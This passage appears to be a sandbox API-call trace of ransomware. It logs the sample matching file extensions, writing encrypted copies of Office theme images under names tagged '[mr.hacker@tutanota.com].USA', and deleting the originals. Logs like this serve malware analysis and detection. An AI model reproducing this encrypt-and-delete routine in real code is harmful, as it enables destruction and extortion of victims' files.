(lpString=".xls") returned 4 [0043.525] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.525] lstrlenW (lpString=".xlsx") returned 5 [0043.525] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.525] lstrlenW (lpString=".ppt") returned 4 [0043.525] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.525] lstrlenW (lpString=".zip") returned 4 [0043.525] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.525] lstrlenW (lpString=".rar") returned 4 [0043.525] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.525] lstrlenW (lpString=".bz2") returned 4 [0043.525] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.525] lstrlenW (lpString=".7z") returned 3 [0043.525] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.525] lstrlenW (lpString=".dbf") returned 4 [0043.525] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.525] lstrlenW (lpString=".1cd") returned 4 [0043.525] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.525] lstrlenW (lpString=".jpg") returned 4 [0043.525] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.525] lstrlenW (lpString=".doc") returned 4 [0043.525] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.525] lstrlenW (lpString=".docx") returned 5 [0043.525] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.525] lstrlenW (lpString=".pdf") returned 4 [0043.525] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.525] lstrlenW (lpString=".xls") returned 4 [0043.526] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.526] lstrlenW (lpString=".xlsx") returned 5 [0043.526] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.526] lstrlenW (lpString=".ppt") returned 4 [0043.526] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.526] lstrlenW (lpString=".zip") returned 4 [0043.526] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.526] lstrlenW (lpString=".rar") returned 4 [0043.526] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.526] lstrlenW (lpString=".bz2") returned 4 [0043.526] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.526] lstrlenW (lpString=".7z") returned 3 [0043.526] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.526] lstrlenW (lpString=".dbf") returned 4 [0043.526] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.526] lstrlenW (lpString=".1cd") returned 4 [0043.526] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.526] lstrlenW (lpString=".jpg") returned 4 [0043.526] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.526] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0043.526] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.895] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2181) returned 1 [0044.895] CloseHandle (hObject=0x210) returned 1 [0044.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 0x20 [0044.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.895] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.895] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.147] GetLastError () returned 0x0 [0045.147] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x885, lpOverlapped=0x0) returned 1 [0045.252] WriteFile (in: hFile=0x200, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x890, lpOverlapped=0x0) returned 1 [0045.252] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.252] WriteFile (in: hFile=0x200, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.253] SetEndOfFile (hFile=0x200) returned 1 [0045.253] CloseHandle (hObject=0x200) returned 1 [0045.253] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.253] SetEndOfFile (hFile=0x210) returned 1 [0045.254] CloseHandle (hObject=0x210) returned 1 [0045.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.254] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 1 [0045.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.254] lstrlenW (lpString=".doc") returned 4 [0045.254] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.254] lstrlenW (lpString=".docx") returned 5 [0045.254] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.254] lstrlenW (lpString=".pdf") returned 4 [0045.254] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.254] lstrlenW (lpString=".xls") returned 4 [0045.254] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.254] lstrlenW (lpString=".xlsx") returned 5 [0045.254] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.254] lstrlenW (lpString=".ppt") returned 4 [0045.254] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.254] lstrlenW (lpString=".zip") returned 4 [0045.254] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString=".rar") returned 4 [0045.255] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString=".bz2") returned 4 [0045.255] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.255] lstrlenW (lpString=".7z") returned 3 [0045.255] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.255] lstrlenW (lpString=".dbf") returned 4 [0045.255] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.255] lstrlenW (lpString=".1cd") returned 4 [0045.255] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.255] lstrlenW (lpString=".jpg") returned 4 [0045.255] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.255] lstrlenW (lpString=".doc") returned 4 [0045.255] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.255] lstrlenW (lpString=".docx") returned 5 [0045.255] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.255] lstrlenW (lpString=".pdf") returned 4 [0045.255] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString=".xls") returned 4 [0045.255] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString=".xlsx") returned 5 [0045.255] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.255] lstrlenW (lpString=".ppt") returned 4 [0045.255] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.255] lstrlenW (lpString=".zip") returned 4 [0045.255] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString=".rar") returned 4 [0045.255] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.255] lstrlenW (lpString=".bz2") returned 4 [0045.256] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.256] lstrlenW (lpString=".7z") returned 3 [0045.256] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.256] lstrlenW (lpString=".dbf") returned 4 [0045.256] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.256] lstrlenW (lpString=".1cd") returned 4 [0045.256] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0045.256] lstrlenW (lpString=".jpg") returned 4 [0045.256] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.256] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.256] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.294] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2044) returned 1 [0045.294] CloseHandle (hObject=0x200) returned 1 [0045.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 0x20 [0045.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.295] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.295] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.527] GetLastError () returned 0x0 [0045.527] ReadFile (in: hFile=0x200, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x7fc, lpOverlapped=0x0) returned 1 [0045.705] WriteFile (in: hFile=0x208, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x800, lpOverlapped=0x0) returned 1 [0045.706] ReadFile (in: hFile=0x200, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.706] WriteFile (in: hFile=0x208, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.706] SetEndOfFile (hFile=0x208) returned 1 [0045.707] CloseHandle (hObject=0x208) returned 1 [0045.707] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.707] SetEndOfFile (hFile=0x200) returned 1 [0045.708] CloseHandle (hObject=0x200) returned 1 [0045.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.708] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 1 [0045.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.708] lstrlenW (lpString=".doc") returned 4 [0045.708] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.708] lstrlenW (lpString=".docx") returned 5 [0045.708] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.708] lstrlenW (lpString=".pdf") returned 4 [0045.708] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.708] lstrlenW (lpString=".xls") returned 4 [0045.709] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString=".xlsx") returned 5 [0045.709] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.709] lstrlenW (lpString=".ppt") returned 4 [0045.709] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.709] lstrlenW (lpString=".zip") returned 4 [0045.709] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString=".rar") returned 4 [0045.709] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString=".bz2") returned 4 [0045.709] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.709] lstrlenW (lpString=".7z") returned 3 [0045.709] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.709] lstrlenW (lpString=".dbf") returned 4 [0045.709] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.709] lstrlenW (lpString=".1cd") returned 4 [0045.709] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.709] lstrlenW (lpString=".jpg") returned 4 [0045.709] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.709] lstrlenW (lpString=".doc") returned 4 [0045.709] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.709] lstrlenW (lpString=".docx") returned 5 [0045.709] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.709] lstrlenW (lpString=".pdf") returned 4 [0045.709] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString=".xls") returned 4 [0045.709] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.709] lstrlenW (lpString=".xlsx") returned 5 [0045.710] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.710] lstrlenW (lpString=".ppt") returned 4 [0045.710] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.710] lstrlenW (lpString=".zip") returned 4 [0045.710] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.710] lstrlenW (lpString=".rar") returned 4 [0045.710] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.710] lstrlenW (lpString=".bz2") returned 4 [0045.710] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.710] lstrlenW (lpString=".7z") returned 3 [0045.710] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.710] lstrlenW (lpString=".dbf") returned 4 [0045.710] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.710] lstrlenW (lpString=".1cd") returned 4 [0045.710] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0045.710] lstrlenW (lpString=".jpg") returned 4 [0045.710] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.710] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.710] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0046.017] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=25106) returned 1 [0046.017] CloseHandle (hObject=0x208) returned 1 [0046.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 0x20 [0046.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0046.019] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.019] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.019] GetLastError () returned 0x0 [0046.019] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x6212, lpOverlapped=0x0) returned 1 [0046.120] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6220, lpOverlapped=0x0) returned 1 [0046.122] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.122] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.122] SetEndOfFile (hFile=0x160) returned 1 [0046.122] CloseHandle (hObject=0x160) returned 1 [0046.122] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.122] SetEndOfFile (hFile=0x208) returned 1 [0046.123] CloseHandle (hObject=0x208) returned 1 [0046.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.123] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1 [0046.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.123] lstrlenW (lpString=".doc") returned 4 [0046.123] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.123] lstrlenW (lpString=".docx") returned 5 [0046.124] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.124] lstrlenW (lpString=".pdf") returned 4 [0046.124] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.124] lstrlenW (lpString=".xls") returned 4 [0046.124] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.124] lstrlenW (lpString=".xlsx") returned 5 